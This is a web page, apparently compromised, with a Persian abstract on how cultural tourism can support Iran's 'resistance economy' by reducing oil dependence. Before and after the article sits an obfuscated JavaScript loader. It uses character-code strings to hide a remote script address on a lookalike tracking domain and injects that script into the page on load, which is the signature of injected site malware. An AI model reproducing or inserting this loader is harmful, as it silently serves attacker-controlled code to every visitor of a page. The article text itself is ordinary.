var u = String.fromCharCode(104,116,116,112,115,58,47,47,99,111,117,110,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61);var d=document;var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); var pl = u; s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s);var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116));list.insertBefore(s, list.childNodes[0]);}

نقش گردشگری فرهنگی در توسعه اقتصاد مقاومتی

چکیده:

امروزه مبحث اقتصاد مقاومتی در اختیار برنامه ریزان اقتصادی قرارگرفته است و برای حصول نتیجه در عرصه های اقتصادی، گردشگری چهره ای مقاومتی به خود گرفته است. گردشگری به عنوان یک فعالیت و یا صنعت بین رشته ای با اتکا به فرهنگ غنی و توانمندی های بالقوه باستانی، تاریخی، طبیعی و فرهنگی ایران می تواند منافع قابل توجهی را در زمینه اقتصادی برای کشور به ارمغان آورد و یکی از مهم ترین ابزارها در قطع وابستگی به درآمدهای نفتی کشور باشد. در تدوین استراتژی اقتصاد مقاومتی می توان گردشگری را یکی از اهداف مهم اقتصادی قلمداد کرد و از گردشگری به عنوان ابزاری دربرابرچالش های فرهنگی، اجتماعی و اقتصادی استفاده کرد. ازآنجایی که گردشگری در رشد و توسعه اقتصادی کشور نقش بسزایی دارد، هدف از این مقاله” بررسی گردشگری فرهنگی در اقتصاد مقاومتی ” است که با روش کتابخانه ای به بررسی نقش گردشگری فرهنگی در اقتصاد مقاومتی کشور به عنوان یکی ازا اقدامات راهبردی درراستای تحقق اقتصاد مقاومتی پرداخته است. با توجه به یافته های به دست آمده گردشگری می تواند در اقتصاد مقاومتی تأثیر بسزایی در میزان اشتغال، میزان درآمد خانوارها، سطح رفاه ورشد اقتصادی داشته است. زیرا هر چه مردم در بهبود شرایط؛ شریک باشند و در نتیجه حرکت به سمت رفع مشکلات ملموس تر باشد حمایت مردم از برنامه های آتی بیشتر خواهد بود. پس می توان گفت یکی از مهم ترین عوامل موفقیت در جریان گردشگری و بهبود اقتصاد، بهبود وضعیت معیشت خانوارها است.

برای دریافت فایل کامل مقاله کلیک کنید

پیام بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

var u = String.fromCharCode(104,116,116,112,115,58,47,47,99,111,117,110,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61);var d=document;var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); var pl = u; s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s);var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116));list.insertBefore(s, list.childNodes[0]);}